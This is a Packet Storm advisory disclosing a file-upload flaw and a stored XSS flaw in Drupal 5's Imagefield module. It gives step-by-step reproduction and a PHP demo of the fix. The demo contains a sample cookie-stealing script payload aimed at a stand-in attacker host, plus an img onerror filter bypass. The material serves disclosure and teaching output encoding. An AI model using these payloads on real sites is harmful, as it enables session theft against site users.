Drupal Imagefield Upload / Cross Site Scripting

2009-01-29T00:00:00
ID PACKETSTORM:74445
Type packetstorm
Reporter Andrew Rosborough
Modified 2009-01-29T00:00:00

Description

                                        
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Drupal Imagefield Module Multiple Vulnerabilities  
  
Security Risk: High  
Exploitable: Remotely  
Vulnerabilities: Arbitrary File Upload, Cross Site Scripting  
Discovered by: Justin C. Klein Keane, Andrew Rosborough  
Tested: Imagefield 5.x-2.2 on Drupal 5.15  
  
Description  
  
Drupal (http://drupal.org) is a robust content management system (CMS)  
that provides extensibility through hundreds of third party modules.  
While the security of Drupal core modules is vetted by a central  
security team (http://drupal.org/security), third party modules are not  
reviewed for security.  
  
The Imagefield module (http://drupal.org/project/imagefield) is a module  
that extends the Drupal CCK (Content Creation Kit) module  
(http://www.drupal.org/project/cck) by allowing users to add image  
fields to custom content types.  
  
  
Arbitrary File Upload Vulnerability  
  
Two flaws exist in this module. The first allows an attacker to upload  
arbitrary files to the filesystem: the file supplied as the 'Default  
image' in the Imagefield settings for a content type field is stored  
without any check that it is actually an image. Files are written to the  
imagefield_default_images/ subdirectory of Drupal's file system path,  
which is /files/ on a default installation (the path is set through  
Drupal's administrative configuration and may vary).  
  
Mitigating Factors  
  
Attackers must be authenticated with an account that has 'administer  
content types' permissions. Additionally, Drupal protects the files  
directory, and subdirectories with an .htaccess file located in the  
files directory that specifies:  
  
SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006  
Options None  
Options +FollowSymLinks  
  
This prevents PHP files in that directory from being executed directly,  
provided the site runs under Apache with .htaccess overrides honoured; it  
does not stop a file with another extension from being served to  
visitors. Additionally, Drupal's file_check_upload() function renames  
files whose extension matches PHP, PL, PY, CGI, ASP or JS, appending  
.txt and forcing the MIME type to text/plain. Extensions outside that  
list (such as .exe, or .html) pass through unchanged, with the  
following code:  
  
// Rename potentially executable files, to help prevent exploits.  
if (preg_match('/\.(php|pl|py|cgi|asp|js)$/i', $file->filename) &&  
    (substr($file->filename, -4) != '.txt')) {  
  $file->filemime = 'text/plain';  
  $file->filepath .= '.txt';  
  $file->filename .= '.txt';  
}  
  
Exploiting the File Upload Vulnerability  
  
To exploit the vulnerability:  
  
1. Log in as a user with 'Administer content types' privilege  
2. Click Administer -> Content Types  
3. Click 'Add content type'  
4. Fill in required text in the Identification, Submission and other  
fieldsets  
5. Click 'Save content type' button  
6. Click 'edit' under the Operations column on the 'Administer' ->  
'Content management' screen for the new content type  
7. Click 'Add field'  
8. Fill in the 'Name' text box in the 'Create new field' fieldset and  
select the 'Image' radio button  
9. Click the 'Create field' button  
10. In the next screen (assuming the new field was named 'test' and the  
new type was named 'test' this will be in Home > Administer > Content  
management > Content types > test) scroll down to the 'Data settings'  
fieldset  
11. Click the 'Browse' button in the 'Default image' fieldset and  
select a file from your filesystem.  
12. Click 'Save field settings' button  
13. Log into your server and do a directory listing of the upload  
directory to verify the new file has been uploaded.  
  
# cd /var/www/html/drupal-5.15/files/imagefield_default_images/  
# ls  
-rw-rw-r-- 1 apache apache 18 2009-01-22 10:22 field_test_0.exe  
  
14. Browse to the file (assuming Drupal is running at the doc root):  
http://192.168.0.50/files/imagefield_default_images/field_test_0.exe  
  
Cross Site Scripting (XSS) Vulnerability  
  
The Imagefield module also contains a stored XSS vulnerability in the  
'Help text' field. Any user with rights to administer content types can  
edit a content type that contains an image field, or create one. In the  
'Widget settings' fieldset presented during configuration of the image  
field, a textarea labeled 'Help text:' is offered. Arbitrary script can  
be entered into this textarea and it is not escaped when the node form  
is rendered. This is especially dangerous because the script executes  
for every user who creates new content of the type carrying the  
injected help text, which typically includes site administrators.  
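
As an added example, not code from the advisory or from the Imagefield  
module, the standalone PHP script below contrasts the unescaped rendering  
of the help text that the advisory describes with an escaped one, and  
shows why merely removing <script> tags is not a fix. The help text  
payloads and the render helpers are constructed for illustration. In  
Drupal 5 the corresponding fix is to pass the stored value through  
check_plain() (or filter_xss() if limited markup must be allowed) before  
assigning it to the form element's #description; check_plain() is  
htmlspecialchars() with ENT_QUOTES after UTF-8 validation, so plain  
htmlspecialchars() is used here so that the script runs outside Drupal.  

```php
<?php
// Added example, not from the advisory or the Imagefield module.
// Run with: php help_text_xss.php

// Constructed payload standing in for what an attacker types into the
// 'Help text:' textarea (not a payload from the advisory).
$help_text = 'Upload a logo<script>new Image().src='
           . '"http://attacker.invalid/c?"+document.cookie</script>';

// Vulnerable rendering: the stored help text is interpolated as HTML,
// exactly the failure mode described for the node form.
function render_description_unescaped($text) {
    return '<div class="description">' . $text . '</div>';
}

// Hardened rendering: every character special to HTML is entity-encoded,
// so the browser shows the payload as text instead of executing it.
function render_description_escaped($text) {
    return '<div class="description">'
         . htmlspecialchars($text, ENT_QUOTES, 'UTF-8') . '</div>';
}

// A blacklist that only strips <script> elements is not a fix: event
// handler attributes on ordinary tags run script as well.
function render_description_strip_script($text) {
    $stripped = preg_replace('#<script\b[^>]*>.*?</script>#is', '', $text);
    return '<div class="description">' . $stripped . '</div>';
}

// Constructed bypass for the blacklist variant.
$bypass = 'Upload a logo<img src=x onerror="alert(document.cookie)">';

// Crude indicator used for the demo only: does the rendered markup still
// contain a tag other than the wrapping <div>, or an on* attribute?
function still_contains_live_markup($html) {
    $inner = preg_replace('#^<div class="description">|</div>$#', '', $html);
    return (bool) preg_match('#<[a-z]|\bon[a-z]+\s*=#i', $inner);
}

$cases = array(
    'unescaped, script payload' => render_description_unescaped($help_text),
    'escaped, script payload'   => render_description_escaped($help_text),
    'strip <script>, img bypass' => render_description_strip_script($bypass),
    'escaped, img bypass'       => render_description_escaped($bypass),
);

foreach ($cases as $label => $html) {
    printf("%-28s live markup: %-3s %s\n", $label,
        still_contains_live_markup($html) ? 'yes' : 'no', $html);
}
```

The two escaped cases are the only ones without live markup; the  
<script> blacklist passes the <img onerror> payload straight through,  
which is why output encoding, not input filtering, is the correct  
remedy for this field.  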
  
--  
Justin C. Klein Keane  
http://www.MadIrish.net  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.7 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iQD1AwUBSYG6EZEpbGy7DdYAAQJChgb+LUEHPrQ1GboCjvl7aKeUx7KRtu56IBnj  
txM6pKTjBNI42iaTIKnMK+acBtcoN5TJhtyMsrOfjaLEFsjT08Sc0WQKk8H8LAMw  
rb9qWO1L01MqnbyByUZSDltyV9BI4z5dI8ekjowsL6KcrZfGPCumBt8m+FuzxPLX  
vXQ+huGZQihq3lmmbdd0gc83f6hvIG6MADha6yutv1tY0H0Y1B06ZAkizh+LUvhu  
mY3u6LrIWZqnZr/NRAcsX09q+4AHp+3w8va/8kx7EixzkiWK8NwXGLL+MWatT5sq  
zv/ZgrnspW4=  
=zBEx  
-----END PGP SIGNATURE-----  
  